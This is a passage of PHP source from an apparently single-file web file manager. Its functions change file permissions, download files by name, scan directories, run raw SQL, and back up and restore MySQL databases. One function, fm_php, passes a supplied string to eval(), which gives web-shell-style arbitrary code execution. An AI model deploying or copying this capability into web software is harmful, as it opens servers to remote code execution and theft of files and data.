'u'; } } //Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); //Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); //World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function fm_convert_rights($mode) { $mode = str_pad($mode,9,'-'); $trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1'); $mode = strtr($mode,$trans); $newmode = '0'; $owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; $group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; $world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; $newmode .= $owner . $group . $world; return intval($newmode, 8); } function fm_chmod($file, $val, $rec = false) { $res = @chmod(realpath($file), $val); if(@is_dir($file) && $rec){ $els = fm_scan_dir($file); foreach ($els as $el) { $res = $res && fm_chmod($file . '/' . $el, $val, true); } } return $res; } //load files function fm_download($file_name) { if (!empty($file_name)) { if (file_exists($file_name)) { header("Content-Disposition: attachment; filename=" . basename($file_name)); header("Content-Type: application/xml"); $fp = fopen($file_name, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); // this is essential for large downloads } fclose($fp); die(); } else { header('HTTP/1.0 404 Not Found', true, 404); header('Status: 404 Not Found'); die(); } } } //show folder size function fm_dir_size($f,$format=true) { if($format) { $size=fm_dir_size($f,false); if($size<=1024) return $size.' bytes'; elseif($size<=1024*1024) return round($size/(1024),2).' Kb'; elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).' Mb'; elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).' Gb'; elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).' Tb'; //:))) else return round($size/(1024*1024*1024*1024*1024),2).' Pb'; // ;-) } else { if(is_file($f)) return filesize($f); $size=0; $dh=opendir($f); while(($file=readdir($dh))!==false) { if($file=='.' || $file=='..') continue; if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file); else $size+=fm_dir_size($f.'/'.$file,false); } closedir($dh); return $size+filesize($f); } } //scan directory function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) { $dir = $ndir = array(); if(!empty($exp)){ $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/'; } if(!empty($type) && $type !== 'all'){ $func = 'is_' . $type; } if(@is_dir($directory)){ $fh = opendir($directory); while (false !== ($filename = readdir($fh))) { if(substr($filename, 0, 1) != '.' || $do_not_filter) { if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){ $dir[] = $filename; } } } closedir($fh); natsort($dir); } return $dir; } function fm_link($get,$link,$name,$title='') { if (empty($title)) $title=$name.' '.basename($link); return '  '.$name.''; } function fm_arr_to_option($arr,$n,$sel=''){ foreach($arr as $v){ $b=$v[$n]; $res.=''; } return $res; } function fm_lang_form ($current='en'){ return '
    '; } function fm_root($dirname){ return ($dirname=='.' OR $dirname=='..'); } function fm_php($string){ $display_errors=ini_get('display_errors'); ini_set('display_errors', '1'); ob_start(); eval(trim($string)); $text = ob_get_contents(); ob_end_clean(); ini_set('display_errors', $display_errors); return $text; } //SHOW DATABASES function fm_sql_connect(){ global $fm_config; return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']); } function fm_sql($query){ global $fm_config; $query=trim($query); ob_start(); $connection = fm_sql_connect(); if ($connection->connect_error) { ob_end_clean(); return $connection->connect_error; } $connection->set_charset('utf8'); $queried = mysqli_query($connection,$query); if ($queried===false) { ob_end_clean(); return mysqli_error($connection); } else { if(!empty($queried)){ while($row = mysqli_fetch_assoc($queried)) { $query_result[]= $row; } } $vdump=empty($query_result)?'':var_export($query_result,true); ob_end_clean(); $connection->close(); return '
    '.stripslashes($vdump).'
    '; } } function fm_backup_tables($tables = '*', $full_backup = true) { global $path; $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; if($tables == '*') { $tables = array(); $result = $mysqldb->query('SHOW TABLES'); while($row = mysqli_fetch_row($result)) { $tables[] = $row[0]; } } else { $tables = is_array($tables) ? $tables : explode(',',$tables); } $return=''; foreach($tables as $table) { $result = $mysqldb->query('SELECT * FROM '.$table); $num_fields = mysqli_num_fields($result); $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter; $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table)); $return.=$row2[1].$delimiter; if ($full_backup) { for ($i = 0; $i < $num_fields; $i++) { while($row = mysqli_fetch_row($result)) { $return.= 'INSERT INTO `'.$table.'` VALUES('; for($j=0; $j<$num_fields; $j++) { $row[$j] = addslashes($row[$j]); $row[$j] = str_replace("\n","\\n",$row[$j]); if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; } if ($j<($num_fields-1)) { $return.= ','; } } $return.= ')'.$delimiter; } } } else { $return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return); } $return.="\n\n\n"; } //save file $file=gmdate("Y-m-d_H-i-s",time()).'.sql'; $handle = fopen($file,'w+'); fwrite($handle,$return); fclose($handle); $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path . '\'"'; return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' ' . __('Delete') . ''; } function fm_restore_tables($sqlFileToExecute) { $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; // Load and explode the sql file $f = fopen($sqlFileToExecute,"r+"); $sqlFile = fread($f,filesize($sqlFileToExecute)); $sqlArray = explode($delimiter,$sqlFile); //Process the sql file by statements foreach ($sqlArray as $stmt) { if (strlen($stmt)>3){ $result = $mysqldb->query($stmt); if (!$result){ $sqlErrorCode = mysqli_errno($mysqldb->connection); $sqlErrorText = mysqli_error($mysqldb->connection); $sqlStmt = $stmt; break; } } } if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute; else return $sqlErrorText.'
    '.$stmt; } function fm_img_link($filename){ return './'.basename(__FILE__).'?img='.base64_encode($filename); } function fm_home_style(){ return ' input, input.fm_input { text-indent: 2px; } input, textarea, select, input.fm_input { color: black; font: normal 8pt Verdana, Arial, Helvetica, sans-serif; border-color: black; background-color: #FCFCFC none !important; border-radius: 0; padding: 2px; } input.fm_input { background: #FCFCFC none !important; cursor: pointer; } .home { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAgRQTFRF/f396Ojo////tT02zr+fw66Rtj432TEp3MXE2DAr3TYp1y4mtDw2/7BM/7BOqVpc/8l31jcqq6enwcHB2Tgi5jgqVpbFvra2nBAV/Pz82S0jnx0W3TUkqSgi4eHh4Tsre4wosz026uPjzGYd6Us3ynAydUBA5Kl3fm5eqZaW7ODgi2Vg+Pj4uY+EwLm5bY9U//7jfLtC+tOK3jcm/71u2jYo1UYh5aJl/seC3jEm12kmJrIA1jMm/9aU4Lh0e01BlIaE///dhMdC7IA//fTZ2c3MW6nN30wf95Vd4JdXoXVos8nE4efN/+63IJgSnYhl7F4csXt89GQUwL+/jl1c41Aq+fb2gmtI1rKa2C4kJaIA3jYrlTw5tj423jYn3cXE1zQoxMHBp1lZ3Dgmqiks/+mcjLK83jYkymMV3TYk//HM+u7Whmtr0odTpaOjfWJfrHpg/8Bs/7tW/7Ve+4U52DMm3MLBn4qLgNVM6MzB3lEflIuL/+jA///20LOzjXx8/7lbWpJG2C8k3TosJKMA1ywjopOR1zYp5Dspiay+yKNhqKSk8NW6/fjns7Oz2tnZuz887b+W3aRY/+ms4rCE3Tot7V85bKxjuEA3w45Vh5uhq6am4cFxgZZW/9qIuwgKy0sW+ujT4TQntz423C8i3zUj/+Kw/a5d6UMxuL6wzDEr////cqJQfAAAAKx0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AAWVFbEAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA2UlEQVQoU2NYjQYYsAiE8U9YzDYjVpGZRxMiECitMrVZvoMrTlQ2ESRQJ2FVwinYbmqTULoohnE1g1aKGS/fNMtk40yZ9KVLQhgYkuY7NxQvXyHVFNnKzR69qpxBPMez0ETAQyTUvSogaIFaPcNqV/M5dha2Rl2Timb6Z+QBDY1XN/Sbu8xFLG3eLDfl2UABjilO1o012Z3ek1lZVIWAAmUTK6L0s3pX+jj6puZ2AwWUvBRaphswMdUujCiwDwa5VEdPI7ynUlc7v1qYURLquf42hz45CBPDtwACrm+RDcxJYAAAAABJRU5ErkJggg=="); background-repeat: no-repeat; }'; } function fm_config_checkbox_row($name,$value) { global $fm_config; return '